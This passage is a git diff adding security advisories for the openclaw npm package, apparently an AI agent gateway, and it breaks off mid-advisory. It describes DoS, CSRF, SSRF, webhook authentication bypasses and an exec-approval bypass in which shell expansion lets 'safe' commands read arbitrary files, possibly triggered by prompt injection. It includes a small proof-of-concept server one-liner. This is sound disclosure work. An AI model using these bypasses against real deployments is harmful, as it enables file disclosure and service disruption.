b/advisories/github-reviewed/2026/02/GHSA-j27p-hq53-9wgc/GHSA-j27p-hq53-9wgc.json new file mode 100644 index 0000000000000..761f54b1f60d6 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-j27p-hq53-9wgc/GHSA-j27p-hq53-9wgc.json @@ -0,0 +1,59 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j27p-hq53-9wgc", + "modified": "2026-02-18T00:51:37Z", + "published": "2026-02-18T00:51:37Z", + "aliases": [], + "summary": "OpenClaw affected by denial of service via unbounded URL-backed media fetch", + "details": "### Summary\nURL-backed media fetch handling allocated the entire response payload in memory (`arrayBuffer`) before enforcing `maxBytes`, allowing oversized responses to cause memory exhaustion.\n\n### Affected Versions\n- `openclaw` (npm): < `2026.2.14`\n- `clawdbot` (npm): <= `2026.1.24-3`\n\n### Patched Versions\n- `openclaw` (npm): `2026.2.14`\n\n### Fix Commit\n- `openclaw/openclaw` `main`: `00a08908892d1743d1fc52e5cbd9499dd5da2fe0`\n\n### Details\nAffected component:\n- `src/media/input-files.ts` (`fetchWithGuard`)\n\nWhen `content-length` is missing or incorrect, reading the body via `response.arrayBuffer()` buffers the full payload before a size check can run.\n\n### Proof of Concept\n1. Configure URL-based media input.\n2. Serve a response larger than `maxBytes` (chunked transfer / no `content-length`).\n3. Trigger the `fetchWithGuard` URL fetch path.\n\nExample local server (large response):\n```bash\nnode -e 'require(\"http\").createServer((_,res)=>{res.writeHead(200,{\"content-type\":\"application/octet-stream\"});for(let i=0;i<1024;i++)res.write(Buffer.alloc(1024*64));res.end();}).listen(18888)'\n```\n\n### Impact\nAvailability loss via memory pressure from attacker-controlled remote media responses.\n\n### Mitigation\nUntil a patched release is available, disable URL-backed media inputs (or restrict to a tight hostname allowlist) and use conservative `maxBytes` limits.\n\n### Credits\nReported by @vincentkoc.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-j27p-hq53-9wgc" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/00a08908892d1743d1fc52e5cbd9499dd5da2fe0" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T00:51:37Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-v773-r54f-q32w/GHSA-v773-r54f-q32w.json b/advisories/github-reviewed/2026/02/GHSA-v773-r54f-q32w/GHSA-v773-r54f-q32w.json new file mode 100644 index 0000000000000..17926bd58524d --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-v773-r54f-q32w/GHSA-v773-r54f-q32w.json @@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v773-r54f-q32w", + "modified": "2026-02-18T00:51:03Z", + "published": "2026-02-18T00:51:03Z", + "aliases": [], + "summary": "OpenClaw Slack: dmPolicy=open allowed any DM sender to run privileged slash commands", + "details": "## Summary\n\nWhen Slack DMs are configured with `dmPolicy=open`, the Slack slash-command handler incorrectly treated any DM sender as command-authorized. This allowed any Slack user who could DM the bot to execute privileged slash commands via DM, bypassing intended allowlist/access-group restrictions.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.2.13`\n- Affected configuration: Slack DMs enabled with `channels.slack.dm.policy: open` (aka `dmPolicy=open`)\n\n## Impact\n\nAny Slack user in the workspace who can DM the bot could invoke privileged slash commands via DM.\n\n## Fix\n\nThe slash-command path now computes `CommandAuthorized` for DMs using the same allowlist/access-group gating logic as other inbound paths.\n\nFix commit(s):\n- f19eabee54c49e9a2e264b4965edf28a2f92e657\n\n## Release Process Note\n\n`patched_versions` is set to the planned next release (`2026.2.14`). Once that npm release is published, this advisory should be published.\n\nThanks @christos-eth for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-v773-r54f-q32w" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/f19eabee54c49e9a2e264b4965edf28a2f92e657" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-285" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T00:51:03Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-xvhf-x56f-2hpp/GHSA-xvhf-x56f-2hpp.json b/advisories/github-reviewed/2026/02/GHSA-xvhf-x56f-2hpp/GHSA-xvhf-x56f-2hpp.json new file mode 100644 index 0000000000000..68ab4a7057642 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-xvhf-x56f-2hpp/GHSA-xvhf-x56f-2hpp.json @@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xvhf-x56f-2hpp", + "modified": "2026-02-18T00:50:47Z", + "published": "2026-02-18T00:50:47Z", + "aliases": [], + "summary": "OpenClaw exec approvals: safeBins could bypass stdin-only constraints via shell expansion", + "details": "## Summary\n\nOpenClaw's exec-approvals allowlist supports a small set of \"safe bins\" intended to be stdin-only (no positional file arguments) when running `tools.exec.host=gateway|node` with `security=allowlist`.\n\nIn affected configurations, the allowlist validation checked pre-expansion argv tokens, but execution used a real shell (`sh -c`) which expands globs and environment variables. This allowed safe bins like `head`, `tail`, or `grep` to read arbitrary local files via tokens such as `*` or `$HOME/...` without triggering approvals.\n\nThis issue is configuration-dependent and is not exercised by default settings (default `tools.exec.host` is `sandbox`).\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected: `<= 2026.2.13`\n- Patched: `>= 2026.2.14` (planned; publish the advisory after the npm release is out)\n\n## Impact\n\nAn authorized but untrusted caller (or prompt-injection) could cause the gateway/node process to disclose files readable by that process when host execution is enabled in allowlist mode.\n\n## Fix\n\nSafe-bins executions now force argv tokens to be treated as literal text at execution time (single-quoted), preventing globbing and `$VARS` expansion from turning \"safe\" tokens into file paths.\n\n## Fix Commit(s)\n\n- 77b89719d5b7e271f48b6f49e334a8b991468c3b\n\n## Release Process Note\n\n`patched_versions` is pre-set for the next planned release (`>= 2026.2.14`) so publishing is a single click once that npm version is available.\n\nThanks @christos-eth for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-xvhf-x56f-2hpp" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/77b89719d5b7e271f48b6f49e334a8b991468c3b" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T00:50:47Z", + "nvd_published_at": null + } +} \ No newline at end of file From 676a0daefa24ed8b896da3aa7297d5a904ef0703 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 00:55:52 +0000 Subject: [PATCH 145/215] Publish Advisories GHSA-3fqr-4cg8-h96q GHSA-c37p-4qqg-3p76 GHSA-h89v-j3x9-8wqj GHSA-mj5r-hh7j-4gxf GHSA-pg2v-8xwh-qhcc GHSA-q447-rj3r-2cgh GHSA-rq6g-px6m-c248 GHSA-w2cg-vxx6-5xjg --- .../GHSA-3fqr-4cg8-h96q.json | 84 ++++++++++++++++++ .../GHSA-c37p-4qqg-3p76.json | 63 ++++++++++++++ .../GHSA-h89v-j3x9-8wqj.json | 86 ++++++++++++++++++ .../GHSA-mj5r-hh7j-4gxf.json | 87 +++++++++++++++++++ .../GHSA-pg2v-8xwh-qhcc.json | 63 ++++++++++++++ .../GHSA-q447-rj3r-2cgh.json | 74 ++++++++++++++++ .../GHSA-rq6g-px6m-c248.json | 83 ++++++++++++++++++ .../GHSA-w2cg-vxx6-5xjg.json | 82 +++++++++++++++++ 8 files changed, 622 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-3fqr-4cg8-h96q/GHSA-3fqr-4cg8-h96q.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-c37p-4qqg-3p76/GHSA-c37p-4qqg-3p76.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-h89v-j3x9-8wqj/GHSA-h89v-j3x9-8wqj.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-mj5r-hh7j-4gxf/GHSA-mj5r-hh7j-4gxf.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-pg2v-8xwh-qhcc/GHSA-pg2v-8xwh-qhcc.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-q447-rj3r-2cgh/GHSA-q447-rj3r-2cgh.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-rq6g-px6m-c248/GHSA-rq6g-px6m-c248.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-w2cg-vxx6-5xjg/GHSA-w2cg-vxx6-5xjg.json diff --git a/advisories/github-reviewed/2026/02/GHSA-3fqr-4cg8-h96q/GHSA-3fqr-4cg8-h96q.json b/advisories/github-reviewed/2026/02/GHSA-3fqr-4cg8-h96q/GHSA-3fqr-4cg8-h96q.json new file mode 100644 index 0000000000000..54ea267f43b37 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-3fqr-4cg8-h96q/GHSA-3fqr-4cg8-h96q.json @@ -0,0 +1,84 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3fqr-4cg8-h96q", + "modified": "2026-02-18T00:53:59Z", + "published": "2026-02-18T00:53:59Z", + "aliases": [ + "CVE-2026-26317" + ], + "summary": "OpenClaw affected by cross-site request forgery (CSRF) through loopback browser mutation endpoints", + "details": "## Summary\nBrowser-facing localhost mutation routes accepted cross-origin browser requests without explicit Origin/Referer validation. Loopback binding reduces remote exposure but does not prevent browser-initiated requests from malicious origins.\n\n## Impact\nA malicious website can trigger unauthorized state changes against a victim's local OpenClaw browser control plane (for example opening tabs, starting/stopping the browser, mutating storage/cookies) if the browser control service is reachable on loopback in the victim's browser context.\n\n## Affected Packages / Versions\n- openclaw (npm): <= 2026.2.13\n- clawdbot (npm): <= 2026.1.24-3\n\n## Details\nThe browser control servers bind to loopback but exposed mutating HTTP endpoints without a CSRF-style guard. Browsers may send cross-origin requests to loopback addresses; without explicit validation, state-changing operations could be triggered from a non-loopback Origin/Referer.\n\n## Fix\nMutating HTTP methods (POST/PUT/PATCH/DELETE) are rejected when the request indicates a non-loopback Origin/Referer (or `Sec-Fetch-Site: cross-site`).\n\n## Fix Commit(s)\n- openclaw/openclaw: b566b09f81e2b704bf9398d8d97d5f7a90aa94c3\n\n## Workarounds / Mitigations\n- Enable browser control auth (token/password) and avoid running with auth disabled.\n- Upgrade to a release that includes the fix.\n\n## Credits\n- Reporter: @vincentkoc\n\n## Release Process Note\n`patched_versions` is set to the planned next release version. Once that npm release is published, the advisory should be ready to publish with no further edits.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "clawdbot" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2026.1.24-3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3fqr-4cg8-h96q" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/b566b09f81e2b704bf9398d8d97d5f7a90aa94c3" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T00:53:59Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-c37p-4qqg-3p76/GHSA-c37p-4qqg-3p76.json b/advisories/github-reviewed/2026/02/GHSA-c37p-4qqg-3p76/GHSA-c37p-4qqg-3p76.json new file mode 100644 index 0000000000000..8ac7f8bac2fa1 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-c37p-4qqg-3p76/GHSA-c37p-4qqg-3p76.json @@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c37p-4qqg-3p76", + "modified": "2026-02-18T00:54:48Z", + "published": "2026-02-18T00:54:48Z", + "aliases": [], + "summary": "OpenClaw Twilio voice-call webhook auth bypass when ngrok loopback compatibility is enabled", + "details": "## Summary\n\nA Twilio webhook signature-verification bypass in the voice-call extension could allow unauthenticated webhook requests when a specific ngrok free-tier compatibility option is enabled.\n\n## Impact\n\nThis issue is limited to configurations that explicitly enable and expose the voice-call webhook endpoint.\n\nNot affected by default:\n- The voice-call extension is optional and disabled by default.\n- The bypass only applied when `tunnel.allowNgrokFreeTierLoopbackBypass` was explicitly enabled.\n- Exploitation required the webhook to be reachable (typically via a public ngrok URL during development).\n\nWorst case (when exposed and the option was enabled):\n- An external attacker could send forged requests to the publicly reachable webhook endpoint that would be accepted without a valid `X-Twilio-Signature`.\n- This could result in unauthorized webhook event handling (integrity) and request flooding (availability).\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.2.13` (latest published as of 2026-02-14)\n- Patched versions: `>= 2026.2.14` (planned next release; pending publish)\n\n## Fix\n\n`allowNgrokFreeTierLoopbackBypass` no longer bypasses signature verification. It only enables trusting forwarded headers on loopback so the public ngrok URL can be reconstructed for correct signature validation.\n\nFix commit(s):\n- ff11d8793b90c52f8d84dae3fbb99307da51b5c9\n\nThanks @p80n-sec for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-c37p-4qqg-3p76" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/ff11d8793b90c52f8d84dae3fbb99307da51b5c9" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T00:54:48Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-h89v-j3x9-8wqj/GHSA-h89v-j3x9-8wqj.json b/advisories/github-reviewed/2026/02/GHSA-h89v-j3x9-8wqj/GHSA-h89v-j3x9-8wqj.json new file mode 100644 index 0000000000000..4ad12588dd3b4 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-h89v-j3x9-8wqj/GHSA-h89v-j3x9-8wqj.json @@ -0,0 +1,86 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h89v-j3x9-8wqj", + "modified": "2026-02-18T00:52:54Z", + "published": "2026-02-18T00:52:54Z", + "aliases": [], + "summary": "OpenClaw affected by denial of service through unguarded archive extraction allowing high expansion/resource abuse (ZIP/TAR)", + "details": "## Summary\nArchive extraction lacked strict resource budgets, allowing high-expansion ZIP/TAR archives to consume excessive CPU/memory/disk during install/update flows.\n\n## Affected Packages / Versions\n- openclaw (npm): <= 2026.2.13\n- clawdbot (npm): <= 2026.1.24-3\n\n## Details\nAffected component: `src/infra/archive.ts` (`extractArchive`).\n\nThe extractor now enforces resource budgets (entry count and extracted byte limits; ZIP also enforces a compressed archive size limit) and rejects over-budget archives.\n\n## Fix Commit(s)\n- openclaw/openclaw@d3ee5deb87ee2ad0ab83c92c365611165423cb71\n- openclaw/openclaw@5f4b29145c236d124524c2c9af0f8acd048fbdea\n\n## Release Process Note\nThis advisory will be updated with patched versions once the next npm release containing the fix is published.\n\n## Credits\nThanks @vincentkoc for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "clawdbot" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2026.1.24-3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-h89v-j3x9-8wqj" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/5f4b29145c236d124524c2c9af0f8acd048fbdea" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/d3ee5deb87ee2ad0ab83c92c365611165423cb71" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T00:52:54Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-mj5r-hh7j-4gxf/GHSA-mj5r-hh7j-4gxf.json b/advisories/github-reviewed/2026/02/GHSA-mj5r-hh7j-4gxf/GHSA-mj5r-hh7j-4gxf.json new file mode 100644 index 0000000000000..5040d01d53fb9 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-mj5r-hh7j-4gxf/GHSA-mj5r-hh7j-4gxf.json @@ -0,0 +1,87 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mj5r-hh7j-4gxf", + "modified": "2026-02-18T00:54:32Z", + "published": "2026-02-18T00:54:32Z", + "aliases": [], + "summary": "OpenClaw Telegram allowlist authorization accepted mutable usernames", + "details": "## Summary\nTelegram allowlist authorization could match on `@username` (mutable/recyclable) instead of immutable numeric sender IDs.\n\n## Impact\nOperators who treat Telegram allowlists as strict identity controls could unintentionally grant access if a username changes hands (identity rebinding/spoof risk). This can allow an unauthorized sender to interact with the bot in allowlist mode.\n\n## Affected Packages / Versions\n- npm `openclaw`: <= 2026.2.13\n- npm `clawdbot`: <= 2026.1.24-3\n\n## Fix\nTelegram allowlist authorization now requires numeric Telegram sender IDs only. `@username` allowlist principals are rejected.\n\nA security audit warning was added to flag legacy configs that still contain non-numeric Telegram allowlist entries.\n\n`openclaw doctor --fix` now attempts to resolve `@username` allowFrom entries to numeric IDs (best-effort; requires a Telegram bot token).\n\n## Fix Commit(s)\n- e3b432e481a96b8fd41b91273818e514074e05c3\n- 9e147f00b48e63e7be6964e0e2a97f2980854128\n\nThanks @vincentkoc for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "clawdbot" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2026.1.24-3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-mj5r-hh7j-4gxf" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/9e147f00b48e63e7be6964e0e2a97f2980854128" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/e3b432e481a96b8fd41b91273818e514074e05c3" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284", + "CWE-290" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T00:54:32Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-pg2v-8xwh-qhcc/GHSA-pg2v-8xwh-qhcc.json b/advisories/github-reviewed/2026/02/GHSA-pg2v-8xwh-qhcc/GHSA-pg2v-8xwh-qhcc.json new file mode 100644 index 0000000000000..ce557dffda10f --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-pg2v-8xwh-qhcc/GHSA-pg2v-8xwh-qhcc.json @@ -0,0 +1,63 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pg2v-8xwh-qhcc", + "modified": "2026-02-18T00:55:00Z", + "published": "2026-02-18T00:55:00Z", + "aliases": [], + "summary": "OpenClaw affected by SSRF in optional Tlon (Urbit) extension authentication", + "details": "## Summary\nThe optional Tlon (Urbit) extension previously accepted a user-provided base URL for authentication and used it to construct an outbound HTTP request, enabling server-side request forgery (SSRF) in affected deployments.\n\n## Impact\nThis only affects deployments that have installed and configured the Tlon (Urbit) extension, and where an attacker can influence the configured Urbit URL. Under those conditions, the gateway could be induced to make HTTP requests to attacker-chosen hosts (including internal addresses).\n\nDeployments that do not use the Tlon extension, or where untrusted users cannot change the Urbit URL, are not impacted.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.2.13`\n\n## Fixed Versions\n- `2026.2.14` (planned next release)\n\n## Fix Commit(s)\n- `bfa7d21e997baa8e3437657d59b1e296815cc1b1`\n\n## Details\nUrbit authentication now validates and normalizes the base URL and uses an SSRF guard that blocks private/internal hosts by default (opt-in: `channels.tlon.allowPrivateNetwork`).\n\n## Release Process Note\nThis advisory is pre-populated with the planned patched version (`2026.2.14`). After `openclaw@2026.2.14` is published to npm, publish this advisory without further edits.\n\nThanks @p80n-sec for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.14" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-pg2v-8xwh-qhcc" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/commit/bfa7d21e997baa8e3437657d59b1e296815cc1b1" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + }, + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.2.14" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T00:55:00Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-q447-rj3r-2cgh/GHSA-q447-rj3r-2cgh.json b/advisories/github-reviewed/2026/02/GHSA-q447-rj3r-2cgh/GHSA-q447-rj3r-2cgh.json new file mode 100644 index 0000000000000..3c7230e120e3d --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-q447-rj3r-2cgh/GHSA-q447-rj3r-2cgh.json @@ -0,0 +1,74 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q447-rj3r-2cgh", + "modified": "2026-02-18T00:53:07Z", + "published": "2026-02-18T00:53:07Z", + "aliases": [], + "summary": "OpenClaw affected by denial of service via unbounded webhook request body buffering", + "details": "### Summary\nMultiple webhook handlers accepted and buffered request bodies without a strict unified byte/time limit. A remote unauthenticated attacker could send oversized payloads and cause memory pressure, degrading availability.\n\n### Details\nAffected packages:\n- `openclaw` (npm): `<2026.2.12`\n- `clawdbot` (npm): `<=2026.1.24-3`\n\nRoot cause:\n- Webhook code paths buffered request payloads without consistent `maxBytes` + `timeoutMs` enforcement.\n- Some SDK-backed handlers parse request bodies internally and needed stream-level guards.\n\nAttack shape:\n- Send very large JSON payloads or slow/incomplete uploads to webhook endpoints.\n- Observe elevated memory usage and request handler pressure.\n\n### Impact\nRemote unauthenticated availability impact (DoS) via request body amplification/memory pressure.\n\n### Patch details (implemented)\n- Added shared bounded request-body helper in `src/infra/http-body.ts`.\n- Exported helper in `src/plugin-sdk/index.ts` for extension reuse.\n- Migrated webhook body readers to shared helper for:\n - LINE\n - Nextcloud Talk\n - Google Chat\n - Zalo\n - BlueBubbles\n - Nostr profile HTTP\n - Voice-call\n - Gateway hooks\n- Added stream guards for SDK handlers that parse request bodies internally:\n - Slack\n - Telegram\n - Feishu\n- Added explicit Express JSON body limit handling for MS Teams webhook path.\n- Standardized failure responses:\n - `413 Payload Too Large`\n - `408 Request Timeout`\n\n### Tests\n- Added regression tests:\n - `src/infra/http-body.test.ts`\n - `src/line/monitor.read-body.test.ts`\n - `extensions/nextcloud-talk/src/monitor.read-body.test.ts`\n- Focused webhook/security test suite passes for patched paths.\n\n### Remediation\nUpgrade to the first release containing this patch.\n\n## Credits\nThanks @vincentkoc for reporting.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "openclaw" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2026.2.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "npm", + "name": "clawdbot" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "2026.1.24-3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-q447-rj3r-2cgh" + }, + { + "type": "PACKAGE", + "url": "https://github.com/openclaw/openclaw" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2026-02-18T00:53:07Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2026/02/GHSA-rq6g-px6m-c248/GHSA-rq6g-px6m-c248.json b/advisories/github-reviewed/2026/02/GHSA-rq6g-px6m-c248/GHSA-rq6g-px6m-c248.json new file mode 100644 index 0000000000000..0b9c970854551 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-rq6g-px6m-c248/GHSA-rq6g-px6m-c248.json @@ -0,0 +1,83 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rq6g-px6m-c248", + "modified": "2026-02-18T00:54:14Z", + "published": "2026-02-18T00:54:14Z", + "aliases": [], + "summary": "OpenClaw Google Chat shared-path webhook target ambiguity allowed cross-account policy-context misrouting", + "details": "## Summary\nWhen multiple Google Chat webhook targets are registered on the same HTTP path, and request verification succeeds for more than one target, inbound webhook events could be routed by first-match semantics. This can cause cross-account policy/context misrouting.\n\n## Affected Packages / Versions\n- npm: `openclaw` <= 2026.2.13\n- npm: `clawdbot` <= 2026.1.24-3\n\n## Details\nAffected component: `extensions/googlechat/src/monitor.ts`.\n\nBaseline behavior allowed multiple webhook targets per path and selected the first target that passed `verifyGoogleChatRequest(...)`. In shared-path deployments where multiple targets can verify successfully (for example, equivalent audience validation), inbound events could be processed under the wrong account context (wrong allowlist/session/policy).\n\n## Fix\n- Fix commit (merged to `main`): 